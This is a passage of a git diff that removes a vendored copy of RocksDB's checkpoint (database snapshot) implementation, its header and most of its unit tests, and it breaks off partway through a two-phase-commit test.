-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2012 Facebook.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file.
-
-#ifndef ROCKSDB_LITE
-
-#include "utilities/checkpoint/checkpoint_impl.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <inttypes.h>
-#include <algorithm>
-#include <string>
-#include <vector>
-
-#include "db/wal_manager.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/transaction_log.h"
-#include "rocksdb/utilities/checkpoint.h"
-#include "util/file_util.h"
-#include "util/filename.h"
-#include "util/sync_point.h"
-
-namespace rocksdb {
-
-Status Checkpoint::Create(DB* db, Checkpoint** checkpoint_ptr) {
-  *checkpoint_ptr = new CheckpointImpl(db);
-  return Status::OK();
-}
-
-Status Checkpoint::CreateCheckpoint(const std::string& checkpoint_dir,
-                                    uint64_t log_size_for_flush) {
-  return Status::NotSupported("");
-}
-
-// Builds an openable snapshot of RocksDB
-Status CheckpointImpl::CreateCheckpoint(const std::string& checkpoint_dir,
-                                        uint64_t log_size_for_flush) {
-  DBOptions db_options = db_->GetDBOptions();
-
-  Status s = db_->GetEnv()->FileExists(checkpoint_dir);
-  if (s.ok()) {
-    return Status::InvalidArgument("Directory exists");
-  } else if (!s.IsNotFound()) {
-    assert(s.IsIOError());
-    return s;
-  }
-
-  ROCKS_LOG_INFO(
-      db_options.info_log,
-      "Started the snapshot process -- creating snapshot in directory %s",
-      checkpoint_dir.c_str());
-  std::string full_private_path = checkpoint_dir + ".tmp";
-  // create snapshot directory
-  s = db_->GetEnv()->CreateDir(full_private_path);
-  uint64_t sequence_number = 0;
-  if (s.ok()) {
-    db_->DisableFileDeletions();
-    s = CreateCustomCheckpoint(
-        db_options,
-        [&](const std::string& src_dirname, const std::string& fname,
-            FileType) {
-          ROCKS_LOG_INFO(db_options.info_log, "Hard Linking %s", fname.c_str());
-          return db_->GetEnv()->LinkFile(src_dirname + fname,
-                                         full_private_path + fname);
-        } /* link_file_cb */,
-        [&](const std::string& src_dirname, const std::string& fname,
-            uint64_t size_limit_bytes, FileType) {
-          ROCKS_LOG_INFO(db_options.info_log, "Copying %s", fname.c_str());
-          return CopyFile(db_->GetEnv(), src_dirname + fname,
-                          full_private_path + fname, size_limit_bytes,
-                          db_options.use_fsync);
-        } /* copy_file_cb */,
-        [&](const std::string& fname, const std::string& contents, FileType) {
-          ROCKS_LOG_INFO(db_options.info_log, "Creating %s", fname.c_str());
-          return CreateFile(db_->GetEnv(), full_private_path + fname, contents);
-        } /* create_file_cb */,
-        &sequence_number, log_size_for_flush);
-    // we copied all the files, enable file deletions
-    db_->EnableFileDeletions(false);
-  }
-
-  if (s.ok()) {
-    // move tmp private backup to real snapshot directory
-    s = db_->GetEnv()->RenameFile(full_private_path, checkpoint_dir);
-  }
-  if (s.ok()) {
-    unique_ptr<Directory> checkpoint_directory;
-    db_->GetEnv()->NewDirectory(checkpoint_dir, &checkpoint_directory);
-    if (checkpoint_directory != nullptr) {
-      s = checkpoint_directory->Fsync();
-    }
-  }
-
-  if (s.ok()) {
-    // here we know that we succeeded and installed the new snapshot
-    ROCKS_LOG_INFO(db_options.info_log, "Snapshot DONE. All is good");
-    ROCKS_LOG_INFO(db_options.info_log, "Snapshot sequence number: %" PRIu64,
-                   sequence_number);
-  } else {
-    // clean all the files we might have created
-    ROCKS_LOG_INFO(db_options.info_log, "Snapshot failed -- %s",
-                   s.ToString().c_str());
-    // we have to delete the dir and all its children
-    std::vector<std::string> subchildren;
-    db_->GetEnv()->GetChildren(full_private_path, &subchildren);
-    for (auto& subchild : subchildren) {
-      std::string subchild_path = full_private_path + "/" + subchild;
-      Status s1 = db_->GetEnv()->DeleteFile(subchild_path);
-      ROCKS_LOG_INFO(db_options.info_log, "Delete file %s -- %s",
-                     subchild_path.c_str(), s1.ToString().c_str());
-    }
-    // finally delete the private dir
-    Status s1 = db_->GetEnv()->DeleteDir(full_private_path);
-    ROCKS_LOG_INFO(db_options.info_log, "Delete dir %s -- %s",
-                   full_private_path.c_str(), s1.ToString().c_str());
-  }
-  return s;
-}
-
-Status CheckpointImpl::CreateCustomCheckpoint(
-    const DBOptions& db_options,
-    std::function<Status(const std::string& src_dirname,
-                         const std::string& src_fname, FileType type)>
-        link_file_cb,
-    std::function<Status(const std::string& src_dirname,
-                         const std::string& src_fname,
-                         uint64_t size_limit_bytes, FileType type)>
-        copy_file_cb,
-    std::function<Status(const std::string& fname, const std::string& contents,
-                         FileType type)>
-        create_file_cb,
-    uint64_t* sequence_number, uint64_t log_size_for_flush) {
-  Status s;
-  std::vector<std::string> live_files;
-  uint64_t manifest_file_size = 0;
-  uint64_t min_log_num = port::kMaxUint64;
-  *sequence_number = db_->GetLatestSequenceNumber();
-  bool same_fs = true;
-  VectorLogPtr live_wal_files;
-
-  bool flush_memtable = true;
-  if (s.ok()) {
-    if (!db_options.allow_2pc) {
-      if (log_size_for_flush == port::kMaxUint64) {
-        flush_memtable = false;
-      } else if (log_size_for_flush > 0) {
-        // If out standing log files are small, we skip the flush.
-        s = db_->GetSortedWalFiles(live_wal_files);
-
-        if (!s.ok()) {
-          return s;
-        }
-
-        // Don't flush column families if total log size is smaller than
-        // log_size_for_flush. We copy the log files instead.
-        // We may be able to cover 2PC case too.
-        uint64_t total_wal_size = 0;
-        for (auto& wal : live_wal_files) {
-          total_wal_size += wal->SizeFileBytes();
-        }
-        if (total_wal_size < log_size_for_flush) {
-          flush_memtable = false;
-        }
-        live_wal_files.clear();
-      }
-    }
-
-    // this will return live_files prefixed with "/"
-    s = db_->GetLiveFiles(live_files, &manifest_file_size, flush_memtable);
-
-    if (s.ok() && db_options.allow_2pc) {
-      // If 2PC is enabled, we need to get minimum log number after the flush.
-      // Need to refetch the live files to recapture the snapshot.
-      if (!db_->GetIntProperty(DB::Properties::kMinLogNumberToKeep,
-                               &min_log_num)) {
-        return Status::InvalidArgument(
-            "2PC enabled but cannot fine the min log number to keep.");
-      }
-      // We need to refetch live files with flush to handle this case:
-      // A previous 000001.log contains the prepare record of transaction tnx1.
-      // The current log file is 000002.log, and sequence_number points to this
-      // file.
-      // After calling GetLiveFiles(), 000003.log is created.
-      // Then tnx1 is committed. The commit record is written to 000003.log.
-      // Now we fetch min_log_num, which will be 3.
-      // Then only 000002.log and 000003.log will be copied, and 000001.log will
-      // be skipped. 000003.log contains commit message of tnx1, but we don't
-      // have respective prepare record for it.
-      // In order to avoid this situation, we need to force flush to make sure
-      // all transactions committed before getting min_log_num will be flushed
-      // to SST files.
-      // We cannot get min_log_num before calling the GetLiveFiles() for the
-      // first time, because if we do that, all the logs files will be included,
-      // far more than needed.
-      s = db_->GetLiveFiles(live_files, &manifest_file_size, flush_memtable);
-    }
-
-    TEST_SYNC_POINT("CheckpointImpl::CreateCheckpoint:SavedLiveFiles1");
-    TEST_SYNC_POINT("CheckpointImpl::CreateCheckpoint:SavedLiveFiles2");
-    db_->FlushWAL(false /* sync */);
-  }
-  // if we have more than one column family, we need to also get WAL files
-  if (s.ok()) {
-    s = db_->GetSortedWalFiles(live_wal_files);
-  }
-  if (!s.ok()) {
-    return s;
-  }
-
-  size_t wal_size = live_wal_files.size();
-
-  // copy/hard link live_files
-  std::string manifest_fname, current_fname;
-  for (size_t i = 0; s.ok() && i < live_files.size(); ++i) {
-    uint64_t number;
-    FileType type;
-    bool ok = ParseFileName(live_files[i], &number, &type);
-    if (!ok) {
-      s = Status::Corruption("Can't parse file name. This is very bad");
-      break;
-    }
-    // we should only get sst, options, manifest and current files here
-    assert(type == kTableFile || type == kDescriptorFile ||
-           type == kCurrentFile || type == kOptionsFile);
-    assert(live_files[i].size() > 0 && live_files[i][0] == '/');
-    if (type == kCurrentFile) {
-      // We will craft the current file manually to ensure it's consistent with
-      // the manifest number. This is necessary because current's file contents
-      // can change during checkpoint creation.
-      current_fname = live_files[i];
-      continue;
-    } else if (type == kDescriptorFile) {
-      manifest_fname = live_files[i];
-    }
-    std::string src_fname = live_files[i];
-
-    // rules:
-    // * if it's kTableFile, then it's shared
-    // * if it's kDescriptorFile, limit the size to manifest_file_size
-    // * always copy if cross-device link
-    if ((type == kTableFile) && same_fs) {
-      s = link_file_cb(db_->GetName(), src_fname, type);
-      if (s.IsNotSupported()) {
-        same_fs = false;
-        s = Status::OK();
-      }
-    }
-    if ((type != kTableFile) || (!same_fs)) {
-      s = copy_file_cb(db_->GetName(), src_fname,
-                       (type == kDescriptorFile) ? manifest_file_size : 0,
-                       type);
-    }
-  }
-  if (s.ok() && !current_fname.empty() && !manifest_fname.empty()) {
-    create_file_cb(current_fname, manifest_fname.substr(1) + "\n",
-                   kCurrentFile);
-  }
-  ROCKS_LOG_INFO(db_options.info_log, "Number of log files %" ROCKSDB_PRIszt,
-                 live_wal_files.size());
-
-  // Link WAL files. Copy exact size of last one because it is the only one
-  // that has changes after the last flush.
-  for (size_t i = 0; s.ok() && i < wal_size; ++i) {
-    if ((live_wal_files[i]->Type() == kAliveLogFile) &&
-        (!flush_memtable ||
-         live_wal_files[i]->StartSequence() >= *sequence_number ||
-         live_wal_files[i]->LogNumber() >= min_log_num)) {
-      if (i + 1 == wal_size) {
-        s = copy_file_cb(db_options.wal_dir, live_wal_files[i]->PathName(),
-                         live_wal_files[i]->SizeFileBytes(), kLogFile);
-        break;
-      }
-      if (same_fs) {
-        // we only care about live log files
-        s = link_file_cb(db_options.wal_dir, live_wal_files[i]->PathName(),
-                         kLogFile);
-        if (s.IsNotSupported()) {
-          same_fs = false;
-          s = Status::OK();
-        }
-      }
-      if (!same_fs) {
-        s = copy_file_cb(db_options.wal_dir, live_wal_files[i]->PathName(), 0,
-                         kLogFile);
-      }
-    }
-  }
-
-  return s;
-}
-
-}  // namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/checkpoint/checkpoint_impl.h b/thirdparty/rocksdb/utilities/checkpoint/checkpoint_impl.h
deleted file mode 100644
index 7deea98..0000000
--- a/thirdparty/rocksdb/utilities/checkpoint/checkpoint_impl.h
+++ /dev/null
@@ -1,55 +0,0 @@
-//  Copyright (c) 2017-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/checkpoint.h"
-
-#include <string>
-#include "rocksdb/db.h"
-#include "util/filename.h"
-
-namespace rocksdb {
-
-class CheckpointImpl : public Checkpoint {
- public:
-  // Creates a Checkpoint object to be used for creating openable snapshots
-  explicit CheckpointImpl(DB* db) : db_(db) {}
-
-  // Builds an openable snapshot of RocksDB on the same disk, which
-  // accepts an output directory on the same disk, and under the directory
-  // (1) hard-linked SST files pointing to existing live SST files
-  // SST files will be copied if output directory is on a different filesystem
-  // (2) a copied manifest files and other files
-  // The directory should not already exist and will be created by this API.
-  // The directory will be an absolute path
-  using Checkpoint::CreateCheckpoint;
-  virtual Status CreateCheckpoint(const std::string& checkpoint_dir,
-                                  uint64_t log_size_for_flush) override;
-
-  // Checkpoint logic can be customized by providing callbacks for link, copy,
-  // or create.
-  Status CreateCustomCheckpoint(
-      const DBOptions& db_options,
-      std::function<Status(const std::string& src_dirname,
-                           const std::string& fname, FileType type)>
-          link_file_cb,
-      std::function<Status(const std::string& src_dirname,
-                           const std::string& fname, uint64_t size_limit_bytes,
-                           FileType type)>
-          copy_file_cb,
-      std::function<Status(const std::string& fname,
-                           const std::string& contents, FileType type)>
-          create_file_cb,
-      uint64_t* sequence_number, uint64_t log_size_for_flush);
-
- private:
-  DB* db_;
-};
-
-}  //  namespace rocksdb
-
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/checkpoint/checkpoint_test.cc b/thirdparty/rocksdb/utilities/checkpoint/checkpoint_test.cc
deleted file mode 100644
index 56c8c6e..0000000
--- a/thirdparty/rocksdb/utilities/checkpoint/checkpoint_test.cc
+++ /dev/null
@@ -1,595 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-// Syncpoint prevents us building and running tests in release
-#ifndef ROCKSDB_LITE
-
-#ifndef OS_WIN
-#include <unistd.h>
-#endif
-#include <iostream>
-#include <thread>
-#include <utility>
-#include "db/db_impl.h"
-#include "port/stack_trace.h"
-#include "port/port.h"
-#include "rocksdb/db.h"
-#include "rocksdb/env.h"
-#include "rocksdb/utilities/checkpoint.h"
-#include "rocksdb/utilities/transaction_db.h"
-#include "util/sync_point.h"
-#include "util/testharness.h"
-
-namespace rocksdb {
-class CheckpointTest : public testing::Test {
- protected:
-  // Sequence of option configurations to try
-  enum OptionConfig {
-    kDefault = 0,
-  };
-  int option_config_;
-
- public:
-  std::string dbname_;
-  std::string alternative_wal_dir_;
-  Env* env_;
-  DB* db_;
-  Options last_options_;
-  std::vector<ColumnFamilyHandle*> handles_;
-
-  CheckpointTest() : env_(Env::Default()) {
-    env_->SetBackgroundThreads(1, Env::LOW);
-    env_->SetBackgroundThreads(1, Env::HIGH);
-    dbname_ = test::TmpDir(env_) + "/db_test";
-    alternative_wal_dir_ = dbname_ + "/wal";
-    auto options = CurrentOptions();
-    auto delete_options = options;
-    delete_options.wal_dir = alternative_wal_dir_;
-    EXPECT_OK(DestroyDB(dbname_, delete_options));
-    // Destroy it for not alternative WAL dir is used.
-    EXPECT_OK(DestroyDB(dbname_, options));
-    db_ = nullptr;
-    Reopen(options);
-  }
-
-  ~CheckpointTest() {
-    rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-    rocksdb::SyncPoint::GetInstance()->LoadDependency({});
-    rocksdb::SyncPoint::GetInstance()->ClearAllCallBacks();
-    Close();
-    Options options;
-    options.db_paths.emplace_back(dbname_, 0);
-    options.db_paths.emplace_back(dbname_ + "_2", 0);
-    options.db_paths.emplace_back(dbname_ + "_3", 0);
-    options.db_paths.emplace_back(dbname_ + "_4", 0);
-    EXPECT_OK(DestroyDB(dbname_, options));
-  }
-
-  // Return the current option configuration.
-  Options CurrentOptions() {
-    Options options;
-    options.env = env_;
-    options.create_if_missing = true;
-    return options;
-  }
-
-  void CreateColumnFamilies(const std::vector<std::string>& cfs,
-                            const Options& options) {
-    ColumnFamilyOptions cf_opts(options);
-    size_t cfi = handles_.size();
-    handles_.resize(cfi + cfs.size());
-    for (auto cf : cfs) {
-      ASSERT_OK(db_->CreateColumnFamily(cf_opts, cf, &handles_[cfi++]));
-    }
-  }
-
-  void CreateAndReopenWithCF(const std::vector<std::string>& cfs,
-                             const Options& options) {
-    CreateColumnFamilies(cfs, options);
-    std::vector<std::string> cfs_plus_default = cfs;
-    cfs_plus_default.insert(cfs_plus_default.begin(), kDefaultColumnFamilyName);
-    ReopenWithColumnFamilies(cfs_plus_default, options);
-  }
-
-  void ReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                const std::vector<Options>& options) {
-    ASSERT_OK(TryReopenWithColumnFamilies(cfs, options));
-  }
-
-  void ReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                const Options& options) {
-    ASSERT_OK(TryReopenWithColumnFamilies(cfs, options));
-  }
-
-  Status TryReopenWithColumnFamilies(
-      const std::vector<std::string>& cfs,
-      const std::vector<Options>& options) {
-    Close();
-    EXPECT_EQ(cfs.size(), options.size());
-    std::vector<ColumnFamilyDescriptor> column_families;
-    for (size_t i = 0; i < cfs.size(); ++i) {
-      column_families.push_back(ColumnFamilyDescriptor(cfs[i], options[i]));
-    }
-    DBOptions db_opts = DBOptions(options[0]);
-    return DB::Open(db_opts, dbname_, column_families, &handles_, &db_);
-  }
-
-  Status TryReopenWithColumnFamilies(const std::vector<std::string>& cfs,
-                                     const Options& options) {
-    Close();
-    std::vector<Options> v_opts(cfs.size(), options);
-    return TryReopenWithColumnFamilies(cfs, v_opts);
-  }
-
-  void Reopen(const Options& options) {
-    ASSERT_OK(TryReopen(options));
-  }
-
-  void Close() {
-    for (auto h : handles_) {
-      delete h;
-    }
-    handles_.clear();
-    delete db_;
-    db_ = nullptr;
-  }
-
-  void DestroyAndReopen(const Options& options) {
-    // Destroy using last options
-    Destroy(last_options_);
-    ASSERT_OK(TryReopen(options));
-  }
-
-  void Destroy(const Options& options) {
-    Close();
-    ASSERT_OK(DestroyDB(dbname_, options));
-  }
-
-  Status ReadOnlyReopen(const Options& options) {
-    return DB::OpenForReadOnly(options, dbname_, &db_);
-  }
-
-  Status TryReopen(const Options& options) {
-    Close();
-    last_options_ = options;
-    return DB::Open(options, dbname_, &db_);
-  }
-
-  Status Flush(int cf = 0) {
-    if (cf == 0) {
-      return db_->Flush(FlushOptions());
-    } else {
-      return db_->Flush(FlushOptions(), handles_[cf]);
-    }
-  }
-
-  Status Put(const Slice& k, const Slice& v, WriteOptions wo = WriteOptions()) {
-    return db_->Put(wo, k, v);
-  }
-
-  Status Put(int cf, const Slice& k, const Slice& v,
-             WriteOptions wo = WriteOptions()) {
-    return db_->Put(wo, handles_[cf], k, v);
-  }
-
-  Status Delete(const std::string& k) {
-    return db_->Delete(WriteOptions(), k);
-  }
-
-  Status Delete(int cf, const std::string& k) {
-    return db_->Delete(WriteOptions(), handles_[cf], k);
-  }
-
-  std::string Get(const std::string& k, const Snapshot* snapshot = nullptr) {
-    ReadOptions options;
-    options.verify_checksums = true;
-    options.snapshot = snapshot;
-    std::string result;
-    Status s = db_->Get(options, k, &result);
-    if (s.IsNotFound()) {
-      result = "NOT_FOUND";
-    } else if (!s.ok()) {
-      result = s.ToString();
-    }
-    return result;
-  }
-
-  std::string Get(int cf, const std::string& k,
-                  const Snapshot* snapshot = nullptr) {
-    ReadOptions options;
-    options.verify_checksums = true;
-    options.snapshot = snapshot;
-    std::string result;
-    Status s = db_->Get(options, handles_[cf], k, &result);
-    if (s.IsNotFound()) {
-      result = "NOT_FOUND";
-    } else if (!s.ok()) {
-      result = s.ToString();
-    }
-    return result;
-  }
-};
-
-TEST_F(CheckpointTest, GetSnapshotLink) {
-  for (uint64_t log_size_for_flush : {0, 1000000}) {
-    Options options;
-    const std::string snapshot_name = test::TmpDir(env_) + "/snapshot";
-    DB* snapshotDB;
-    ReadOptions roptions;
-    std::string result;
-    Checkpoint* checkpoint;
-
-    options = CurrentOptions();
-    delete db_;
-    db_ = nullptr;
-    ASSERT_OK(DestroyDB(dbname_, options));
-    ASSERT_OK(DestroyDB(snapshot_name, options));
-    env_->DeleteDir(snapshot_name);
-
-    // Create a database
-    Status s;
-    options.create_if_missing = true;
-    ASSERT_OK(DB::Open(options, dbname_, &db_));
-    std::string key = std::string("foo");
-    ASSERT_OK(Put(key, "v1"));
-    // Take a snapshot
-    ASSERT_OK(Checkpoint::Create(db_, &checkpoint));
-    ASSERT_OK(checkpoint->CreateCheckpoint(snapshot_name, log_size_for_flush));
-    ASSERT_OK(Put(key, "v2"));
-    ASSERT_EQ("v2", Get(key));
-    ASSERT_OK(Flush());
-    ASSERT_EQ("v2", Get(key));
-    // Open snapshot and verify contents while DB is running
-    options.create_if_missing = false;
-    ASSERT_OK(DB::Open(options, snapshot_name, &snapshotDB));
-    ASSERT_OK(snapshotDB->Get(roptions, key, &result));
-    ASSERT_EQ("v1", result);
-    delete snapshotDB;
-    snapshotDB = nullptr;
-    delete db_;
-    db_ = nullptr;
-
-    // Destroy original DB
-    ASSERT_OK(DestroyDB(dbname_, options));
-
-    // Open snapshot and verify contents
-    options.create_if_missing = false;
-    dbname_ = snapshot_name;
-    ASSERT_OK(DB::Open(options, dbname_, &db_));
-    ASSERT_EQ("v1", Get(key));
-    delete db_;
-    db_ = nullptr;
-    ASSERT_OK(DestroyDB(dbname_, options));
-    delete checkpoint;
-
-    // Restore DB name
-    dbname_ = test::TmpDir(env_) + "/db_test";
-  }
-}
-
-TEST_F(CheckpointTest, CheckpointCF) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"one", "two", "three", "four", "five"}, options);
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"CheckpointTest::CheckpointCF:2", "DBImpl::GetLiveFiles:2"},
-       {"DBImpl::GetLiveFiles:1", "CheckpointTest::CheckpointCF:1"}});
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  ASSERT_OK(Put(0, "Default", "Default"));
-  ASSERT_OK(Put(1, "one", "one"));
-  ASSERT_OK(Put(2, "two", "two"));
-  ASSERT_OK(Put(3, "three", "three"));
-  ASSERT_OK(Put(4, "four", "four"));
-  ASSERT_OK(Put(5, "five", "five"));
-
-  const std::string snapshot_name = test::TmpDir(env_) + "/snapshot";
-  DB* snapshotDB;
-  ReadOptions roptions;
-  std::string result;
-  std::vector<ColumnFamilyHandle*> cphandles;
-
-  ASSERT_OK(DestroyDB(snapshot_name, options));
-  env_->DeleteDir(snapshot_name);
-
-  Status s;
-  // Take a snapshot
-  rocksdb::port::Thread t([&]() {
-    Checkpoint* checkpoint;
-    ASSERT_OK(Checkpoint::Create(db_, &checkpoint));
-    ASSERT_OK(checkpoint->CreateCheckpoint(snapshot_name));
-    delete checkpoint;
-  });
-  TEST_SYNC_POINT("CheckpointTest::CheckpointCF:1");
-  ASSERT_OK(Put(0, "Default", "Default1"));
-  ASSERT_OK(Put(1, "one", "eleven"));
-  ASSERT_OK(Put(2, "two", "twelve"));
-  ASSERT_OK(Put(3, "three", "thirteen"));
-  ASSERT_OK(Put(4, "four", "fourteen"));
-  ASSERT_OK(Put(5, "five", "fifteen"));
-  TEST_SYNC_POINT("CheckpointTest::CheckpointCF:2");
-  t.join();
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-  ASSERT_OK(Put(1, "one", "twentyone"));
-  ASSERT_OK(Put(2, "two", "twentytwo"));
-  ASSERT_OK(Put(3, "three", "twentythree"));
-  ASSERT_OK(Put(4, "four", "twentyfour"));
-  ASSERT_OK(Put(5, "five", "twentyfive"));
-  ASSERT_OK(Flush());
-
-  // Open snapshot and verify contents while DB is running
-  options.create_if_missing = false;
-  std::vector<std::string> cfs;
-  cfs=  {kDefaultColumnFamilyName, "one", "two", "three", "four", "five"};
-  std::vector<ColumnFamilyDescriptor> column_families;
-    for (size_t i = 0; i < cfs.size(); ++i) {
-      column_families.push_back(ColumnFamilyDescriptor(cfs[i], options));
-    }
-  ASSERT_OK(DB::Open(options, snapshot_name,
-        column_families, &cphandles, &snapshotDB));
-  ASSERT_OK(snapshotDB->Get(roptions, cphandles[0], "Default", &result));
-  ASSERT_EQ("Default1", result);
-  ASSERT_OK(snapshotDB->Get(roptions, cphandles[1], "one", &result));
-  ASSERT_EQ("eleven", result);
-  ASSERT_OK(snapshotDB->Get(roptions, cphandles[2], "two", &result));
-  for (auto h : cphandles) {
-      delete h;
-  }
-  cphandles.clear();
-  delete snapshotDB;
-  snapshotDB = nullptr;
-  ASSERT_OK(DestroyDB(snapshot_name, options));
-}
-
-TEST_F(CheckpointTest, CheckpointCFNoFlush) {
-  Options options = CurrentOptions();
-  CreateAndReopenWithCF({"one", "two", "three", "four", "five"}, options);
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  ASSERT_OK(Put(0, "Default", "Default"));
-  ASSERT_OK(Put(1, "one", "one"));
-  Flush();
-  ASSERT_OK(Put(2, "two", "two"));
-
-  const std::string snapshot_name = test::TmpDir(env_) + "/snapshot";
-  DB* snapshotDB;
-  ReadOptions roptions;
-  std::string result;
-  std::vector<ColumnFamilyHandle*> cphandles;
-
-  ASSERT_OK(DestroyDB(snapshot_name, options));
-  env_->DeleteDir(snapshot_name);
-
-  Status s;
-  // Take a snapshot
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCallFlush:start", [&](void* arg) {
-        // Flush should never trigger.
-        FAIL();
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  Checkpoint* checkpoint;
-  ASSERT_OK(Checkpoint::Create(db_, &checkpoint));
-  ASSERT_OK(checkpoint->CreateCheckpoint(snapshot_name, 1000000));
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  delete checkpoint;
-  ASSERT_OK(Put(1, "one", "two"));
-  ASSERT_OK(Flush(1));
-  ASSERT_OK(Put(2, "two", "twentytwo"));
-  Close();
-  EXPECT_OK(DestroyDB(dbname_, options));
-
-  // Open snapshot and verify contents while DB is running
-  options.create_if_missing = false;
-  std::vector<std::string> cfs;
-  cfs = {kDefaultColumnFamilyName, "one", "two", "three", "four", "five"};
-  std::vector<ColumnFamilyDescriptor> column_families;
-  for (size_t i = 0; i < cfs.size(); ++i) {
-    column_families.push_back(ColumnFamilyDescriptor(cfs[i], options));
-  }
-  ASSERT_OK(DB::Open(options, snapshot_name, column_families, &cphandles,
-                     &snapshotDB));
-  ASSERT_OK(snapshotDB->Get(roptions, cphandles[0], "Default", &result));
-  ASSERT_EQ("Default", result);
-  ASSERT_OK(snapshotDB->Get(roptions, cphandles[1], "one", &result));
-  ASSERT_EQ("one", result);
-  ASSERT_OK(snapshotDB->Get(roptions, cphandles[2], "two", &result));
-  ASSERT_EQ("two", result);
-  for (auto h : cphandles) {
-    delete h;
-  }
-  cphandles.clear();
-  delete snapshotDB;
-  snapshotDB = nullptr;
-  ASSERT_OK(DestroyDB(snapshot_name, options));
-}
-
-TEST_F(CheckpointTest, CurrentFileModifiedWhileCheckpointing) {
-  const std::string kSnapshotName = test::TmpDir(env_) + "/snapshot";
-  ASSERT_OK(DestroyDB(kSnapshotName, CurrentOptions()));
-  env_->DeleteDir(kSnapshotName);
-
-  Options options = CurrentOptions();
-  options.max_manifest_file_size = 0;  // always rollover manifest for file add
-  Reopen(options);
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {// Get past the flush in the checkpoint thread before adding any keys to
-       // the db so the checkpoint thread won't hit the WriteManifest
-       // syncpoints.
-       {"DBImpl::GetLiveFiles:1",
-        "CheckpointTest::CurrentFileModifiedWhileCheckpointing:PrePut"},
-       // Roll the manifest during checkpointing right after live files are
-       // snapshotted.
-       {"CheckpointImpl::CreateCheckpoint:SavedLiveFiles1",
-        "VersionSet::LogAndApply:WriteManifest"},
-       {"VersionSet::LogAndApply:WriteManifestDone",
-        "CheckpointImpl::CreateCheckpoint:SavedLiveFiles2"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  rocksdb::port::Thread t([&]() {
-    Checkpoint* checkpoint;
-    ASSERT_OK(Checkpoint::Create(db_, &checkpoint));
-    ASSERT_OK(checkpoint->CreateCheckpoint(kSnapshotName));
-    delete checkpoint;
-  });
-  TEST_SYNC_POINT(
-      "CheckpointTest::CurrentFileModifiedWhileCheckpointing:PrePut");
-  ASSERT_OK(Put("Default", "Default1"));
-  ASSERT_OK(Flush());
-  t.join();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  DB* snapshotDB;
-  // Successful Open() implies that CURRENT pointed to the manifest in the
-  // checkpoint.
-  ASSERT_OK(DB::Open(options, kSnapshotName, &snapshotDB));
-  delete snapshotDB;
-  snapshotDB = nullptr;
-}
-
-TEST_F(CheckpointTest, CurrentFileModifiedWhileCheckpointing2PC) {
-  Close();
-  const std::string kSnapshotName = test::TmpDir(env_) + "/snapshot";
-  const std::string dbname = test::TmpDir() + "/transaction_testdb";
-  ASSERT_OK(DestroyDB(kSnapshotName, CurrentOptions()));
-  ASSERT_OK(DestroyDB(dbname, CurrentOptions()));
-  env_->DeleteDir(kSnapshotName);
-  env_->DeleteDir(dbname);
-
-  Options options = CurrentOptions();
-  options.allow_2pc = true;
-  // allow_2pc is implicitly set with tx prepare
-  // options.allow_2pc = true;
-  TransactionDBOptions txn_db_options;
-  TransactionDB* txdb;
-  Status s = TransactionDB::Open(options, txn_db_options, dbname, &txdb);
-  assert(s.ok());
-  ColumnFamilyHandle* cfa;
-  ColumnFamilyHandle* cfb;
-  ColumnFamilyOptions cf_options;
-  ASSERT_OK(txdb->CreateColumnFamily(cf_options, "CFA", &cfa));
-
-  WriteOptions write_options;
-  // Insert something into CFB so lots of log files will be kept
-  // before creating the checkpoint.
-  ASSERT_OK(txdb->CreateColumnFamily(cf_options, "CFB", &cfb));
-  ASSERT_OK(txdb->Put(write_options, cfb, "", ""));
-
-  ReadOptions read_options;
-  std::string value;
-  TransactionOptions txn_options;
-  Transaction* txn = txdb->BeginTransaction(write_options, txn_options);
-  s = txn->SetName("xid");
-  ASSERT_OK(s);
-  ASSERT_EQ(txdb->GetTransactionByName("xid"), txn);
-
-  s = txn->Put(Slice("foo"), Slice("bar"));
-  s = txn->Put(cfa, Slice("foocfa"), Slice("barcfa"));
-  ASSERT_OK(s);
-  // Writing prepare into middle of first WAL, then flush WALs many times
-  for (int i = 1; i <= 100000; i++) {
-    Transaction* tx = txdb->BeginTransaction(write_options, txn_options);
-    ASSERT_OK(tx->SetName("x"));
-    ASSERT_OK(tx->Put(Slice(std::to_string(i)), Slice("val")));
-    ASSERT_OK(tx->Put(cfa, Slice("aaa"), Slice("111")));
-    ASSERT_OK(tx->Prepare());
-    ASSERT_OK(tx->Commit());
-    if (i % 10000 == 0) {
-      txdb->Flush(FlushOptions());
-    }
-    if (i == 88888) {
